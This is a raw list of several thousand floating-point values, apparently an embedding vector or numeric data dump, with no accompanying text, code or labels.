0.0065217590890824795, 0.011549985967576504, -0.01685558259487152, -0.01047606486827135, -0.01237498503178358, -0.0002589234500192106, 0.01898919977247715, -0.014394809491932392, -0.011678002774715424, 0.0005529626505449414, 0.002864382229745388, -0.020440060645341873, 0.002085611689835787, -0.012922612950205803, -0.012190070934593678, 0.030610306188464165, 0.0009503490291535854, 0.02753789722919464, 0.008698049932718277, -0.029557721689343452, -0.00032004271633923054, -0.018747391179203987, 0.00939503125846386, 0.0002535893872845918, -0.019856872037053108, 0.010241366922855377, -0.009601281024515629, -0.01721118576824665, 0.018149977549910545, -0.016741789877414703, -0.018420236185193062, 0.01285860501229763, 0.00829977449029684, -0.013712052255868912, -0.024181004613637924, 0.00611281581223011, 0.010717874392867088, -0.02284393645823002, -0.008890075609087944, -0.00835667084902525, -0.01675601303577423, 0.014081879518926144, 0.0029906213749200106, -0.03413788974285126, 0.021151266992092133, -0.030610306188464165, -0.03629995509982109, -0.02039738930761814, -0.023313332349061966, 0.0022260749246925116, -0.014088991098105907, 0.01174201164394617, -0.00708716781809926, -0.019970664754509926, 0.001621549716219306, 0.03701116144657135, 0.00336756044998765, 0.01721118576824665, -0.005558074917644262, -0.01807885617017746, 0.01823532208800316, 0.025959020480513573, -0.0038547366857528687, 0.005586523097008467, -0.02004178613424301, -0.009224342182278633, 0.00047339650336652994, -0.045943908393383026, 0.010611194185912609, 0.004445037804543972, -0.003986309748142958, -0.0012232743902131915, -0.015262480825185776, 0.015461619012057781, -0.0002660354948602617, 0.015319377183914185, 0.025745658203959465, -0.003237765282392502, 0.007204516790807247, -0.005088679026812315, 0.008754946291446686, 0.02086678519845009, -0.014188559725880623, -0.005999022629112005, -0.002610126044601202, 0.005725208669900894, 0.014849981293082237, -0.01989954523742199, 0.0049393256194889545, -0.006863138172775507, -0.016670668497681618, 0.011941148899495602, 0.006155488081276417, 0.00478286063298583, -0.010035117156803608, -0.028832292184233665, -0.005149131640791893, -0.0035809222608804703, -0.04452149569988251, 0.026158157736063004, -0.01083166804164648, 0.014437481760978699, -0.0060808113776147366, -0.003947193268686533, -0.011791795492172241, 0.003716051345691085, -0.0071511766873300076, 0.009914211928844452, -0.025902122259140015, -0.002839490072801709, -0.015561187639832497, 0.007257857359945774, 0.007759257685393095, 0.015362050384283066, 0.013804508373141289, 0.012887053191661835, -0.005437170155346394, 0.02967151440680027, -0.00036738236667588353, 0.001161932828836143, -0.0107889948412776, -0.003013735404238105, -0.035275816917419434, 0.018149977549910545, 0.004021869972348213, -0.010355159640312195, 0.009366583079099655, 0.02217540331184864, 0.0012454995885491371, 0.004448593594133854, -0.009153221733868122, 0.007325422018766403, 0.00284126796759665, 0.018192650750279427, 0.007496111560612917, 0.00260123610496521, 0.016827134415507317, 0.006130595691502094, -0.012723475694656372, 0.005885229911655188, -0.020240923389792442, -0.020496957004070282, 0.0031897590961307287, 0.018093081191182137, -0.026968931779265404, 0.027665914967656136, 0.006358181592077017, 0.011130373924970627, 0.00029515050118789077, 0.01473618857562542, 0.004317020531743765, -0.004402365069836378, -0.011173046194016933, 0.020084457471966743, -0.014565499499440193, 0.051918040961027145, 0.01675601303577423, -0.012965286150574684, -0.02987065352499485, 0.0006965373759157956, 0.024949107319116592, -0.01625816896557808, 0.01645730808377266, 0.006148376036435366, -0.004679735749959946, -0.009523048996925354, -0.01797928847372532, -0.02193359285593033, 0.01950126886367798, -0.008520248346030712, 0.02142152562737465, -0.006763569079339504, -0.033739615231752396, -0.004864649381488562, -0.002524781273677945, 0.009707962162792683, -0.00023114195209927857, 0.020895233377814293, -0.03098013438284397, 0.006137707736343145, -0.0018313555046916008, 0.02025514654815197, -0.00876205787062645, 0.006201716605573893, 0.019060321152210236, -0.018363339826464653, -0.007659688591957092, -0.011151710525155067, -0.012332312762737274, -0.013584034517407417, 0.0031933151185512543, 0.005511846859008074, -0.003348002443090081, 0.006091479677706957, 0.029244791716337204, 0.0056220837868750095, -0.01445881836116314, -0.0051846918649971485, -0.013584034517407417, 0.01349157840013504, 0.018036184832453728, -0.012161622755229473, -0.006276393309235573, 0.0014517492381855845, -0.015205584466457367, -0.03297151252627373, -0.0008169978973455727, -0.0018882519798353314, -0.014195672236382961, -0.011130373924970627, 0.029586169868707657, 0.008676713332533836, 0.014302353374660015, 0.013285328634083271, 0.00625150091946125, 0.009103436954319477, 0.008442015387117863, 0.02278704009950161, 0.01382584497332573, 0.012872829101979733, -0.009103436954319477, -0.0025674537755548954, 0.01237498503178358, -0.0052984850481152534, 0.009167445823550224, 0.033597372472286224, 0.009459040127694607, 0.0006992043927311897, 0.008626928552985191, 0.0044805980287492275, 0.0025816778652369976, 0.006560875568538904, -0.013690715655684471, 0.008733609691262245, 0.02987065352499485, -0.010006668977439404, -0.02100902609527111, -0.0037338316906243563, -0.017054719850420952, -0.009494599886238575, 0.0010952572338283062, 0.0010943682864308357, -0.01389696542173624, 0.003360448405146599, -0.006198160350322723, 0.033341336995363235, 0.0115215377882123, -0.007051607593894005, 0.007624128367751837, 0.021492645144462585, 0.024721521884202957, 0.00006967596709728241, -0.0028839404694736004, 0.02221807651221752, 0.01595946215093136, 0.008157532662153244, 0.002162066288292408, -0.008868739008903503, 0.012310976162552834, -0.024365918710827827, -0.042501673102378845, -0.024735745042562485, 0.007588568143546581, -0.001413521938957274, 0.03231720253825188, 0.019572390243411064, -0.004249455872923136, 0.02004178613424301, 0.018164202570915222, 0.0017753479769453406, -0.013776060193777084, 0.005753656849265099, 0.0016820022137835622, 0.014892653562128544, 0.002700804965570569, -0.003513357834890485, -0.01551851537078619, 0.005376717541366816, 0.0020713876001536846, 0.005806996952742338, -0.0013806286733597517, -0.008776281960308552, -0.01521980855613947, -0.007360982242971659, -0.01108770165592432, 0.009892875328660011, 0.0010108015267178416, -0.00758145609870553, 0.004701071884483099, -0.005462062079459429, -0.011173046194016933, -0.012211407534778118, -0.0027363651897758245, -0.025404278188943863, -0.018306443467736244, -0.005664756055921316, 0.004505489952862263, -0.0044805980287492275, 0.0053091528825461864, 0.004590834956616163, 0.013079078868031502, 0.0008067743037827313, -0.020824111998081207, 0.03043961711227894, -0.0017157845431938767, -0.013740500435233116, -0.002247411059215665, -0.01283726841211319, -0.003751611802726984, 0.006955594755709171, -0.008264213800430298, -0.03462151065468788, 0.0068986983969807625, -0.005984798539429903, -0.010611194185912609, 0.0038334005512297153, -0.02004178613424301, -0.012645242735743523, -0.020824111998081207, 0.004768636543303728, -0.0016642221016809344, 0.01605903171002865, 0.024181004613637924, 0.004725963808596134, 0.0011654888512566686, -0.00020391610451042652, -0.0003947193326894194, -0.004949993919581175, 0.00175578985363245, 0.0011797129409387708, 0.00477219233289361, 0.01797928847372532, -0.0017406767001375556, 0.012246967293322086, -0.01625816896557808, -0.00018402455316390842, 0.01009912509471178, -0.005490510258823633, 0.010796107351779938, -0.010276926681399345, 0.021947817876935005, 0.0028608262073248625, -0.010646753944456577, -0.0020109349861741066, -0.024081435054540634, -0.023128420114517212, -0.008050852455198765, 0.00477219233289361, -0.021179715171456337, 0.0001346846402157098, 0.01032671146094799, 0.03581633418798447, -0.01361959520727396, -0.005181135609745979, -0.016983600333333015, -0.01384718157351017, -0.006930702831596136, -0.0031844249460846186, 0.008363782428205013, -0.0077948179095983505, -0.006692448630928993, 0.011023693718016148, 0.003797840094193816, 0.014821533113718033, -0.021762903779745102, -0.005494066514074802, 0.014565499499440193, -0.023114195093512535, -0.026798242703080177, -0.010020893067121506, -0.0024643288925290108, -0.0026296842843294144, 0.006646220106631517, -0.00840645469725132, 0.001351291430182755, 0.008726498112082481, -0.01088856440037489, 0.002647464396432042, -0.031662892550230026, -0.009558608755469322, 0.01833489164710045, -0.003691159188747406, 0.009203005582094193, -0.005120683461427689, 0.00911766104400158, 0.015191360376775265, 0.009601281024515629, -0.021478421986103058, 0.004206783603876829, 0.008235765621066093, 0.00666044419631362, -0.00270258286036551, -0.018946528434753418, 0.003273325739428401, -0.009835978969931602, 0.036072369664907455, -0.00456949882209301, -0.007065831683576107, 0.002229630947113037, -0.0032235411927103996, -0.005035338457673788, -0.001281948876567185, -0.005142019595950842, -0.007232964970171452, -0.0063368454575538635, 0.014394809491932392, 0.018263770267367363, 0.01721118576824665, -0.007894386537373066, 0.009978220798075199, 0.016073256731033325, 0.034905992448329926, 0.0014072989579290152, -0.00913899764418602, 0.014501490630209446, -0.019913768395781517, -0.0003936080902349204, 0.0028377119451761246, 0.0026136820670217276, -0.02328488416969776, 0.016699116677045822, 0.009551497176289558, -0.00871227402240038, 0.012993734329938889, 0.02896030992269516, 0.0007898831972852349, 0.01859092526137829, 0.010348047129809856, -0.0009459040011279285, 0.02987065352499485, -0.017054719850420952, 0.012019381858408451, -0.004942881874740124, -0.0017086724983528256, 0.032430995255708694, -0.002094501629471779, -0.00883317831903696, -0.012922612950205803, -0.008328222669661045, -0.01321420818567276, -0.007375206332653761, 0.02470729686319828, 0.010276926681399345, -0.002610126044601202, 0.015006447210907936, 0.004114327020943165, 0.01283726841211319, -0.015859894454479218, 0.015063343569636345, -0.001644663861952722, 0.020027561113238335, 0.020127130672335625, -0.0228866096585989, 0.005568743217736483, 0.006230164784938097, -0.04449304938316345, -0.014337913133203983, -0.008797618560492992, -0.0013806286733597517, 0.0007907722028903663, -0.002346979919821024, -0.015148688107728958, -0.01762368530035019, 0.004718851763755083, 0.009999556466937065, -0.01131528802216053, 0.006290617398917675, -0.03436547517776489, -0.01255989819765091, 0.011613993905484676, 0.007108503952622414, -0.0012366094160825014, 0.010717874392867088, -0.007908610627055168, -0.0016037696041166782, -0.013925413601100445, -0.014921102672815323, -0.017851270735263824, 0.004576610866934061, 0.0041641113348305225, -0.004309908486902714, -0.0056256395764648914, 0.013100414536893368, -0.007887274958193302, -0.015632309019565582, -0.007289861794561148, -0.00883317831903696, -0.02338445372879505, -0.011393520049750805, 0.01954394206404686, 0.002819931833073497, 0.01659954898059368, 0.011030805297195911, 0.010668090544641018, -0.000026920259188045748, -0.0019682627171278, -0.004285016097128391, -0.017965063452720642, 0.0008876739884726703, -0.005906566046178341, 0.008171756751835346, 0.0014001867966726422, 0.005956350360065699, -0.002571009797975421, -0.0036804911214858294, 0.019615061581134796, 0.00200026691891253, -0.007816154509782791, 0.0023131975904107094, 0.01685558259487152, -0.014181448146700859, 0.017182737588882446, -0.014295240864157677, 0.018619373440742493, 0.009914211928844452, -0.01604480855166912, -0.0032466554548591375, 0.01103791780769825, -0.00477219233289361, -0.004804196767508984, -0.006276393309235573, 0.02156376652419567, -0.006937814876437187, 0.004469929728657007, 0.01116593461483717, -0.0098217548802495, 0.0004240565758664161, 0.004896653350442648, 0.01776592619717121, 0.00883317831903696, -0.0025496736634522676, -0.004861093126237392, 0.006415078416466713, -0.014032094739377499, -0.008185980841517448, -0.009423479437828064, -0.0075387838296592236, -0.01605903171002865, 0.01564653217792511, 0.03140685707330704, 0.009480375796556473, -0.018420236185193062, -0.013000845909118652, 0.005028226412832737, 0.028846515342593193, -0.005433613900095224, -0.03413788974285126, -0.006219496484845877, -0.00913899764418602, -0.033426683396101, 0.001215273281559348, 0.010362271219491959, -0.021179715171456337, -0.008114860393106937, -0.007993956096470356, 0.016130153089761734, -0.02911677397787571, 0.013925413601100445, 0.007058719638735056, -0.012040717527270317, 0.009985332377254963, -0.012118950486183167, 0.003527581924572587, -0.025190917775034904, 0.021862473338842392, 0.019472820684313774, 0.006443526595830917, 0.019430147483944893, 0.01750989258289337, -0.004626395180821419, 0.014650844037532806, -0.0013708495534956455, -0.016229720786213875, 0.012794596143066883, -0.01659954898059368, -0.015618083998560905, -0.02536160685122013, 0.018718942999839783, 0.026357294991612434, 0.021350404247641563, -0.0025585636030882597, -0.01382584497332573, 0.015276704914867878, 0.006244388874620199, 0.003908077254891396, -0.00631550932303071, -0.007745033595710993, -0.029330136254429817, 0.0175241157412529, 0.0015335379866883159, -0.006710228975862265, 0.0028359340503811836, -0.026158157736063004, 0.017253857105970383, -0.0043490249663591385, -0.015319377183914185, -0.03012668713927269, -0.013918302021920681, 0.009281238541007042, 0.012951061129570007, -0.03032582439482212, 0.0027203629724681377, 0.011891365051269531, 0.018562477082014084, 0.01480730902403593, -0.0036093704402446747, 0.004793528467416763, -0.004199671559035778, -0.0004871761193498969, -0.038149092346429825, 0.0236973837018013, 0.000294483732432127, -0.0027683693915605545, 0.011137486435472965, 0.0016766681801527739, -0.010589857585728168, 0.008378006517887115, -0.03868960589170456, -0.006201716605573893, -0.0030973022803664207, 0.02537583000957966, -0.006535983178764582, 0.005981242749840021, -0.01859092526137829, 0.005582967307418585, -0.010717874392867088, 0.001388629782013595, 0.0050637866370379925, -0.027352983132004738, 0.009928436018526554, -0.025489624589681625, 0.01610170491039753, 0.017893943935632706, -0.007122728042304516, 0.022317644208669662, -0.00722940918058157, 0.017837047576904297, -0.012474553659558296, -0.012673690915107727, -0.0061341519467532635, 0.0056256395764648914, 0.01433080155402422, -0.011208606883883476, -0.011599769815802574, 0.0017611238872632384, -0.004473485983908176, 0.008790506049990654, 0.006920034531503916, 0.000029420592909445986, -0.03439392149448395, -0.012574122287333012, 0.020795663818717003, 0.011820243671536446, 0.024721521884202957, 0.012168735265731812, -0.02941548079252243, 0.00969373807311058, 0.017993511632084846, 0.0013806286733597517, 0.007481887470930815, 0.026698673143982887, -0.007510335650295019, -0.00533048901706934, 0.025432726368308067, -0.010220030322670937, 0.01311463862657547, -0.013740500435233116, 0.006706672720611095, -0.04241632670164108, -0.000498733192216605, -0.009238566271960735, 0.020013337954878807, -0.00807218812406063, -0.003365782555192709, 0.02456505596637726, 0.00526648061349988, -0.00028959420160390437, -0.0019095881143584847, -0.026499535888433456, 0.0197999756783247, -0.0023576479870826006, 0.00933813489973545, 0.013740500435233116, 0.0045410506427288055, 0.001088145188987255, 0.015717653557658195, -0.0026759125757962465, -0.0004178335366304964, -0.022004714235663414, 0.011080590076744556, 0.0052984850481152534, 0.003858292708173394, 0.004071654286235571, 0.01776592619717121, 0.005831889342516661, -0.01817842572927475, 0.007752145640552044, 0.002695470815524459, -0.01934480294585228, -0.00736809428781271, 0.021478421986103058, -0.005725208669900894, -0.0011539317201822996, -0.02389652281999588, -0.024593504145741463, -0.019302131608128548, 0.0003358225803822279, 0.002323865657672286, 0.015561187639832497, -0.008157532662153244, 0.006333289667963982, 0.012552786618471146, -0.014465929940342903, -0.0053091528825461864, -0.009451927617192268, -0.004448593594133854, -0.026556432247161865, -0.009174557402729988, -0.008264213800430298, -0.008164645172655582, -0.0188327357172966, -0.0098217548802495, 0.01146464142948389, 0.005390941631048918, 0.007136952597647905, -0.01516291219741106, -0.03348357975482941, -0.0032697697170078754, 0.016884030774235725, 0.0002451438340358436, -0.006486198864877224, -0.012965286150574684, 0.013968085870146751, 0.002192292595282197, -0.009096325375139713, 0.017296530306339264, -0.027808155864477158, 0.0029230567160993814, -0.015660757198929787, -0.0022509670816361904, -0.019430147483944893, 0.007268525660037994, -0.05740854889154434, -0.02455083094537258, 0.015632309019565582, -0.003257323522120714, -0.004053874406963587, -0.013854293152689934, 0.027011604979634285, 0.016585323959589005, 0.014032094739377499, 0.004309908486902714, 0.014622395858168602, 0.00400053383782506, 0.007208073046058416, -0.001192159135825932, 0.006976930890232325, 0.021350404247641563, 0.006169712170958519, -0.0005911900079809129, 0.008470463566482067, -0.025446951389312744, 0.00443081371486187, 0.017040496692061424, 0.009331023320555687, -0.01625816896557808, 0.007332534063607454, 0.008392230607569218, 0.011542873457074165, 0.011507313698530197, 0.011101925745606422, 0.018391788005828857, -0.005710984114557505, -0.0051242392510175705, 0.008093524724245071, 0.016727564856410027, -0.00918878149241209, -0.0046157268807291985, -0.02142152562737465, 0.0012579456670209765, 0.000007688526238780469, 0.006052363198250532, -0.007915723137557507, -0.003504467662423849, -0.03132151439785957, 0.006180380471050739, -0.003975641448050737, -0.013299552723765373, 0.004238788038492203, 0.004882429260760546, -0.008193093352019787, -0.013633819296956062, -0.0038974089547991753, 0.02177712880074978, 0.016485756263136864, 0.013221319764852524, -0.007624128367751837, 0.0026439083740115166, 0.016869807615876198, -0.003620038740336895, 0.01731075532734394, -0.00797973107546568, -0.025034451857209206, 0.005038894712924957, -0.007752145640552044, 0.011585545726120472, 0.0023665379267185926, 0.01473618857562542, -0.0023754280991852283, 0.037096504122018814, -0.009572832845151424, 0.02537583000957966, -0.0363568514585495, -0.011308175511658192, 0.004146330989897251, -0.012645242735743523, 0.004085878375917673, 0.009259901940822601, -0.002023381181061268, 0.006852469872683287, -0.027210742235183716, -0.003964973613619804, 0.030951686203479767, -0.0054798424243927, 0.018548252061009407, 0.0014739744365215302, -0.024977555498480797, 0.0028305999003350735, -0.010063565336167812, 0.011045029386878014, 0.0010250256163999438, -0.004839756991714239, -0.017609460279345512, 0.021791351959109306, 0.012972397729754448, -0.0012650577118620276, -0.008449127897620201, 0.014593947678804398, 0.02349824644625187, -0.01179890800267458, 0.00520247220993042, 0.0005671867984347045, 0.033085305243730545, -0.0019255903316661716, 0.013569810427725315, -0.0019327023765072227, 0.006425746250897646, 0.008513135835528374, 0.015276704914867878, -0.0005711873527616262, -0.0022971953731030226, -0.020923681557178497, -0.016627997159957886, -0.01675601303577423, -0.009459040127694607, 0.006717341020703316, -0.002880384447053075, 0.016571100801229477, -0.0009743522386997938, -0.006831133738160133, -0.0068275779485702515, -0.0017060054233297706, 0.006895142141729593, -0.008043739944696426, 0.0030226255767047405, 0.007716585416346788, -0.022858161479234695, -0.009124773554503918, 0.0036182606127113104, 0.009914211928844452, -0.01452993880957365, -0.005725208669900894, 0.013093302957713604, 0.020127130672335625, 0.011528649367392063, -0.010874340310692787, -0.0032022050581872463, 0.01376894861459732, 0.0035951463505625725, -0.014430370181798935, 0.01797928847372532, -0.000949460023548454, -0.002839490072801709, -0.007236521225422621, 0.0038405125960707664, 0.013576922938227654, -0.009373695589601994, -0.010988133028149605, 0.014501490630209446, -0.02035471610724926, -0.0017442327225580812, 0.008975420147180557, 0.00398986553773284, 0.023882297798991203, 0.005518958903849125, -0.003403120907023549, -0.0025052232667803764, -0.004779304377734661, -0.0013459573965519667, 0.013555586338043213, 0.00876205787062645, -0.008882963098585606, -0.012438992969691753, -0.027879275381565094, -0.00339956465177238, -0.01590256579220295, 0.012417657300829887, -0.006902254186570644, 0.010596970096230507, -0.009523048996925354, -0.011699339374899864, 0.009003868326544762, -0.010340935550630093, 0.0009690182050690055, 0.006475530564785004, 0.0057465448044240475, 0.004964218009263277, -0.012126062996685505, 0.011955372989177704, 0.010554296895861626, 0.01384718157351017, -0.003979197703301907, -0.01009912509471178, 0.008306886069476604, -0.03277237340807915, -0.01467929221689701, -0.006696004886180162, 0.01807885617017746, -0.013612483628094196, -0.000016585547200520523, -0.005778548773378134, -0.003275103634223342, 0.0038120641838759184, 0.017054719850420952, -0.019856872037053108, 0.005590079352259636, 0.02221807651221752, -0.014878429472446442, -0.030411168932914734, -0.002480330877006054, 0.010653866454958916, -0.0009423479787074029, 0.009587056934833527, -0.016329290345311165, 0.014039207249879837, -0.016514204442501068, 0.0015486511401832104, 0.016115928068757057, 0.006528871133923531, -0.006916478741914034, 0.002994177397340536, 0.015660757198929787, -0.004914433695375919, 0.0379783995449543, -0.023270661011338234, -0.008648265153169632, -0.018007736653089523, -0.0186762697994709, -0.003056407906115055, 0.00855580810457468, -0.004292128141969442, -0.018064633011817932, 0.000720540585462004, 0.016926703974604607, -0.002647464396432042, 0.009835978969931602, -0.023626264184713364, 0.01047606486827135, 0.0008214429253712296, -0.016172824427485466, -0.006863138172775507, 0.014665068127214909, -0.010981020517647266, 0.016670668497681618, -0.009999556466937065, 0.003968529403209686, 0.024081435054540634, -0.00589945400133729, 0.019273683428764343, -0.010867227800190449, 0.00024203229986596853, -0.012182959355413914, 0.014693516306579113, -0.003947193268686533, 0.0021051696967333555, 0.008591368794441223, -0.034251682460308075, 0.00024203229986596853, 0.00164910894818604, 0.003932969179004431, -0.031776685267686844, -0.013612483628094196, -0.002293639350682497, -0.008961196057498455, 0.004590834956616163, -0.009793306700885296, -0.007200961001217365, -0.004608614835888147, -0.005230920389294624, -0.00855580810457468, 0.002007378963753581, 0.008854514919221401, 0.008491800166666508, -0.017125841230154037, 0.013733387924730778, 0.006130595691502094, 0.016329290345311165, -0.006991154979914427, 0.012118950486183167, 0.02282971329987049, -0.005924345925450325, -0.007908610627055168, -0.010909900069236755, -0.013882741332054138, 0.011336623691022396, 0.005614971276372671, 0.03954305499792099, -0.00131662015337497, -0.026570657268166542, 0.001802018261514604, -0.0026812467258423567, 0.01833489164710045, -0.007069387938827276, -0.029643066227436066, 0.0012410545023158193, 0.005337601061910391, -0.006639108061790466, -0.021990489214658737, 0.03510512784123421, 0.001240165438503027, 0.0051242392510175705, 0.01970040611922741, 0.0013103970559313893, -0.01321420818567276, 0.01807885617017746, -0.00829977449029684, -0.02110859379172325, -0.009779082611203194, -0.016798686236143112, 0.02142152562737465, 0.011919813230633736, 0.03408099338412285, 0.019984889775514603, 0.0021282839588820934, 0.010376496240496635, -0.008527359925210476, 0.015234032645821571, -0.010419168509542942, 0.0029443928506225348, 0.001975374761968851, 0.003088412107899785, 0.029443928971886635, 0.009665289893746376, 0.005661199800670147, -0.03297151252627373, 0.00333022209815681, 0.011336623691022396, -0.010981020517647266, -0.0008161088917404413, -0.007332534063607454, -0.01833489164710045, -0.0075387838296592236, -0.007652576547116041, -0.0227301437407732, -0.008577144704759121, 0.005145575385540724, -0.0321180634200573, 0.01685558259487152, -0.006215940695255995, 0.013591147027909756, -0.011628217995166779, 0.0024981112219393253, -0.005138463340699673, 0.004853981081396341, -0.020624974742531776, 0.0017308976966887712, -0.008413567207753658, 0.002446548780426383, 0.019458597525954247, -0.003915189299732447, -0.014494379051029682, -0.010070676915347576, -0.006333289667963982, -0.005035338457673788, -0.010675202123820782, 0.007617016322910786, -0.014693516306579113, -0.025247814133763313, -0.003691159188747406, 0.0017335646552965045, 0.0041676671244204044, 0.01706894487142563, -0.022061610594391823, 0.006169712170958519, -0.0007583234109915793, -0.0020411612931638956, 0.015660757198929787, 0.021592214703559875, -0.020240923389792442, 0.004046762362122536, 0.013633819296956062, -0.006084367632865906, -0.004711739718914032, -0.0136409318074584, 0.0188327357172966, -0.00876205787062645, 0.01661377213895321, 0.028490912169218063, 0.002085611689835787, 0.04207494854927063, 0.003049295861274004, -0.021962041035294533, -0.0056327516213059425, 0.0025372274685651064, 0.007389430422335863, 0.005362493451684713, -0.018107304349541664, 0.005853225477039814, -0.0004569498705677688, -0.012446105480194092, 0.02753789722919464, 0.011827356182038784, 0.027680138126015663, 0.009167445823550224, -0.013832957483828068, -0.0023985423613339663, 0.01869049482047558, 0.011841580271720886, 0.009757746942341328, 0.051718901842832565, 0.0012695027980953455, -0.02318531647324562, 0.007481887470930815, -0.021592214703559875, -0.010191582143306732, 0.017125841230154037, 0.0014304131036624312, 0.007410766556859016, -0.004946437664330006, -0.021051697432994843, -0.019956441596150398, -0.026471087709069252, -0.004181891214102507, 0.008285550400614738, 0.01762368530035019, 0.006169712170958519, -0.00666044419631362, -0.0010899232001975179, -0.0077236974611878395, 0.01509179174900055, -0.008477576076984406, -0.015931013971567154, -0.017026271671056747, 0.00016079923079814762, -0.00724007748067379, -0.0010436947923153639, -0.01595946215093136, 0.008093524724245071, 0.0000608414520684164, -0.019686182960867882, 0.019643509760499, -0.0038476246409118176, -0.02130773290991783, 0.009380807168781757, 0.002871494274586439, -0.01100946869701147, 0.001023247605189681, -0.0038120641838759184, -0.0008152198861353099, 0.0014650843804702163, 0.0146081717684865, 0.01093834824860096, 0.0036698230542242527, -0.006034582853317261, 0.0056860921904444695, -0.0021282839588820934, -0.00555451912805438, -0.012261191383004189, -0.01093834824860096, -0.011436192318797112, -0.0021140598691999912, -0.014430370181798935, 0.005792772863060236, 0.0026616884861141443, 0.0022740813437849283, 0.017239633947610855, -0.01473618857562542, -0.011841580271720886, -0.013555586338043213, 0.0026936926878988743, -0.003751611802726984, -0.008840290829539299, 0.01701204851269722, -0.0013130641309544444, 0.002055385382845998, 0.0008832289604470134, -0.021122818812727928, -0.004036094062030315, 0.025333158671855927, -0.009629729203879833, 0.0078730508685112, -0.009942660108208656, 0.012751923874020576, 0.007080055773258209, 0.004957105964422226, -0.004153443034738302, -0.008257102221250534, 0.0036698230542242527, 0.0007476553437300026, 0.0028928304091095924, -0.0005454061320051551, -0.0040325382724404335, -0.009949772618710995, 0.005078011192381382, -0.01685558259487152, 0.0040432061068713665, 0.01706894487142563, 0.02632884681224823, 0.002076721517369151, 0.02348402328789234, -0.025660313665866852, 0.003751611802726984, -0.00954438466578722, -0.00708716781809926, 0.005910121835768223, -0.006681780330836773, 0.001161932828836143, -0.008754946291446686, 0.0011014803312718868, -0.001321065123192966, 0.02294350601732731, 0.010618305765092373, -0.006191048305481672, 0.0027594794519245625, -0.02723919041454792, -0.010632529854774475, 0.004004090093076229, 0.009103436954319477, -0.007595680188387632, 0.006304841488599777, -0.0024358807131648064, 0.011052141897380352, -0.00023247546050697565, -0.0290598776191473, 0.0014455262571573257, 0.009210118092596531, -0.001672223093919456, -0.005486954469233751, -0.003929413389414549, 0.006233720574527979, 0.009387919679284096, -0.004960661754012108, -0.01382584497332573, -0.022758591920137405, 0.006895142141729593, -0.004302796442061663, 0.0027985956985503435, -0.007617016322910786, -0.01605903171002865, 0.003915189299732447, 0.015276704914867878, -0.002871494274586439, 0.016115928068757057, -0.0014357471372932196, 0.005294928792864084, 0.02820643037557602, -0.013754724524915218, 0.004366804845631123, -0.00975063443183899, -0.008662489242851734, 0.014003646560013294, 0.01928790658712387, -0.024579279124736786, -0.008491800166666508, 0.006888030096888542, -0.009131885133683681, 0.0022260749246925116, 0.025902122259140015, 0.014593947678804398, -0.004864649381488562, -0.007894386537373066, 0.02292928285896778, -0.0037942840717732906, 0.008164645172655582, -0.002169178333133459, 0.0073467581532895565, -0.0017540118424221873, 0.010312487371265888, -0.0016482200007885695, 0.014423257671296597, 0.005238032434135675, 0.014302353374660015, -0.008847402408719063, 0.009053652174770832, 0.009451927617192268, -0.023626264184713364, -0.01529092900454998, -0.014160111546516418, 0.012965286150574684, 0.007965506985783577, 0.01893230341374874, -0.008804730139672756, -0.00504956254735589, -0.007688137236982584, 0.0008583367452956736, 0.0039720856584608555, 0.039571501314640045, 0.02359781600534916, 0.0028554920572787523, -0.016983600333333015, -0.01081033144146204, -0.014394809491932392, 0.031975824385881424, 0.011429080739617348, -0.006543095223605633, -0.005614971276372671, -0.0035809222608804703, 0.0056932042352855206, 0.005117127206176519, 0.00835667084902525, 0.013022182509303093, 0.01817842572927475, 0.026656001806259155, 0.008463351987302303, 0.017438771203160286, 0.02253100648522377, -0.0017877941718325019, -0.007179624866694212, -0.021905144676566124, 0.01480730902403593, -0.008520248346030712, 0.02156376652419567, 0.015461619012057781, -0.009224342182278633, -0.04056718945503235, -0.02834867127239704, -0.015347826294600964, 0.01817842572927475, 0.010312487371265888, 0.007375206332653761, -0.004974886309355497, 0.031179271638393402, 0.02237454056739807, 0.015063343569636345, 0.0046121710911393166, 0.0035151357296854258, 0.013939637690782547, 0.00020413835591170937, -0.0019558165222406387, -0.021037474274635315, -0.011123262345790863, 0.018818510696291924, 0.015546963550150394, -0.0014873095788061619, 0.02521936595439911, 0.006486198864877224, -0.01787971891462803, 0.00049206567928195, 0.00039449709584005177, -0.011123262345790863, 0.0073467581532895565, -0.005110015161335468, 0.000056507538829464465, -0.004398809280246496, -0.00666044419631362, 0.009999556466937065, -0.013178647495806217, 0.014337913133203983, 0.029330136254429817, -0.004007645882666111, -0.013925413601100445, 0.0022278528194874525, -0.002263413043692708, 0.03032582439482212, 0.00456949882209301, -0.011251279152929783, -0.0006378628895618021, 0.02405298687517643, 0.01659954898059368, -0.0026670226361602545, -0.0026119041722267866, 0.004231675993651152, -0.003634262830018997, 0.029557721689343452, 0.012438992969691753, 0.006973375100642443, -0.018107304349541664, -0.0008049962925724685, 0.01833489164710045, 0.010554296895861626, -0.008491800166666508, -0.004957105964422226, -0.007129840552806854, -0.021435748785734177, -0.004626395180821419, -0.019003424793481827, 0.003120416309684515, 0.026855139061808586, -0.010739210993051529, -0.002060719532892108, -0.03376806154847145, 0.023028850555419922, 0.0016126596601679921, -0.023014627397060394, 0.02162066288292408, 0.002553229685872793, -0.005959906615316868, 0.008605592884123325, -0.012040717527270317, 0.012033605948090553, -0.01100946869701147, 0.00611281581223011, 0.0042885723523795605, 0.02800729312002659, 0.0026492425240576267, 0.009459040127694607, -0.016784461215138435, -0.00954438466578722, -0.03624305874109268, -0.016940927132964134, -0.005454950034618378, 0.0175241157412529, 0.010205806232988834, -0.02187669649720192, -0.017680581659078598, -0.01321420818567276, -0.01731075532734394, -0.01144330482929945, 0.000004028315288451267, -0.0043596928007900715, -0.011841580271720886, -0.010291150771081448, -0.007048051804304123, -0.01681290939450264, 0.019017649814486504, 0.003652042942121625, -0.016272393986582756, -0.039372365921735764, 0.0020696094725281, 0.006016802974045277, 0.003644930897280574, 0.0008396676275879145, 0.010803219862282276, -0.01960083842277527, -0.0227301437407732, -0.0186762697994709, -0.002610126044601202, -0.01731075532734394, 0.029187895357608795, -0.012261191383004189, 0.024181004613637924, 0.0035329158417880535, -0.02166333608329296, -0.015575411729514599, 0.005234476178884506, 0.004409477114677429, -0.00012134952703490853, 0.03649909421801567, -0.012815932743251324, -0.01605903171002865, -0.007652576547116041, 0.014316577464342117, -0.0012748368317261338, 0.02886074036359787, -0.0026990268379449844, 0.019117217510938644, 0.004679735749959946, 0.01994221657514572, 0.017893943935632706, -0.010767659172415733, -0.0017193405656144023, -0.006272837053984404, -0.007183180656284094, 0.012538562528789043, -0.01594523899257183, 